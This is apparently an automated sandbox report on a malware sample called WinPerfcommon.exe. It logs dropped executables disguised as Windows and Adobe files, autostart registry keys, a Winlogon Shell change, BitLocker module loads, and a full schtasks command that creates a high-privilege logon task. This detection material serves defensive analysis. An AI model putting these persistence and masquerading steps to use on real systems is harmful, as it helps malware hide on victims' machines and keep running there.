                              Source: WinPerfcommon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: WinPerfcommon.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: WinPerfcommon.exeStatic file information: File size 2020864 > 1048576
                              Source: WinPerfcommon.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ece00
                              Source: WinPerfcommon.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: System.Windows.Forms.pdb source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA6B000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: bN.PDB source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA22000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.pdb source: WinPerfcommon.exe, 00000000.00000002.1747143226.00000000031DD000.00000004.00000800.00020000.00000000.sdmp
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9B800C0D push ebx; retf 0_2_00007FFD9B800C1A
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9B8000AD pushad ; iretd 0_2_00007FFD9B8000C1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9BC15601 pushad ; retf 0_2_00007FFD9BC159CD
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9BC159BC pushad ; retf 0_2_00007FFD9BC159CD
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeCode function: 49_2_00007FFD9B7E0C0D push ebx; retf 49_2_00007FFD9B7E0C1A
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeCode function: 49_2_00007FFD9B7E00AD pushad ; iretd 49_2_00007FFD9B7E00C1
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeCode function: 49_2_00007FFD9BBF5601 pushad ; retf 49_2_00007FFD9BBF59CD
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeCode function: 49_2_00007FFD9BBF59BC pushad ; retf 49_2_00007FFD9BBF59CD
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeCode function: 50_2_00007FFD9B7C0C0D push ebx; retf 50_2_00007FFD9B7C0C1A
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeCode function: 50_2_00007FFD9B7C00AD pushad ; iretd 50_2_00007FFD9B7C00C1
                              Source: WinPerfcommon.exeStatic PE information: section name: .text entropy: 7.574103435922908
                              Source: SgrmBroker.exe.0.drStatic PE information: section name: .text entropy: 7.574103435922908
                              Source: SystemSettings.exe.0.drStatic PE information: section name: .text entropy: 7.574103435922908
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe.0.drStatic PE information: section name: .text entropy: 7.574103435922908
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe0.0.drStatic PE information: section name: .text entropy: 7.574103435922908
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: section name: .text entropy: 7.574103435922908

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops executable to a common third party application directory
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile written: C:\Program Files\Adobe\StartMenuExperienceHost.exeJump to behavior
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\yHNOGCAC.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\PipMsYLy.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\GKMojBlr.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\ZQJbcBRg.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\iFHJmzLo.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\zsLwvutf.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\GEhWIfwR.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Recovery\SystemSettings.exeJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\fyKARhRs.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\EAqnjiFq.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exeJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\izcrMdWN.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Recovery\SgrmBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Program Files\Adobe\StartMenuExperienceHost.exeJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\ZWotDWGG.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\PoUdTuAY.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\YLyBcRbf.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\zGtWfQBc.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exeJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\zsLwvutf.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\zGtWfQBc.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\izcrMdWN.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\ZQJbcBRg.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\YLyBcRbf.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\PipMsYLy.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\GEhWIfwR.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\fyKARhRs.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\yHNOGCAC.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\iFHJmzLo.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\ZWotDWGG.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\PoUdTuAY.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\GKMojBlr.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile created: C:\Users\user\Desktop\EAqnjiFq.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBrokerJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBrokerJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBrokerJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBrokerJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBrokerJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbNJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
